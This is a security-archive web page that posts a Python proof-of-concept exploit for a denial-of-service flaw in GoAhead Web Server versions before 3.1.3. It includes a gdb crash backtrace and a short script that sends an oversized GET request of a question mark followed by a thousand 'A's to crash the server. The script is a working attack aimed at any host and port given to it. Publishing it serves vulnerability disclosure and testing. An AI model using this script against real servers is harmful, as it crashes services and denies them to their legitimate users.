GoAhead Web Server 3.1.x Denial Of Service

GoAhead Web Server 3.1.x Denial Of Service: Posted Feb 26, 2014; Authored by Alaeddine MESBAHI; GoAhead Web Server versions prior to 3.1.3 suffer from a denial of service vulnerability.; tags | exploit, web, denial of service; SHA-256 | 62316905684cbb42f570b049e4d87177417005d271d14da5f3b675df0a3f533a; Download | Favorite | View

GoAhead Web Server 3.1.x Denial Of Service

#!/usr/bin/python
 
'''
GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2.
The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) !
 
Official Issue Post:
https://github.com/embedthis/goahead/issues/77
 
(gdb) bt
#0  0x00007ffff7a50425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007ffff7a53b8b in __GI_abort () at abort.c:91
#2  0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201
#3  0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:5039
#4  0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=<optimized out>) at src/http.c:457
#5  0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520
#6  complete (wp=0x40cfc0, reuse=1) at src/http.c:575
#7  0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837
#8  0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797
#9  socketEvent (wptr=0x40cfc0, mask=2, sid=<optimized out>) at src/http.c:735
#10 socketEvent (sid=<optimized out>, mask=2, wptr=0x40cfc0) at src/http.c:723
#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=<optimized out>) at src/http.c:714
#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327
#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639
#14 socketProcess () at src/socket.c:623
#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290
#16 0x00000000004012ee in main (argc=<optimized out>, argv=0x7fffffffdfd8, envp=<optimized out>) at src/goahead.c:146
'''
 
 
import socket
import os
import sys
import struct
 
HOST = sys.argv[1]
PORT = int(sys.argv[2])
 
crash = '?'*1 + 'A' * 1000
 
payload = 'GET ' + crash + ' HTTP/1.1\r\n'
payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n'
 
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect((HOST,PORT))
expl.send(payload)
data = expl.recv(1024)
print data
expl.close()

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

GoAhead Web Server 3.1.x Denial Of Service

GoAhead Web Server 3.1.x Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GoAhead Web Server 3.1.x Denial Of Service

Share This

GoAhead Web Server 3.1.x Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems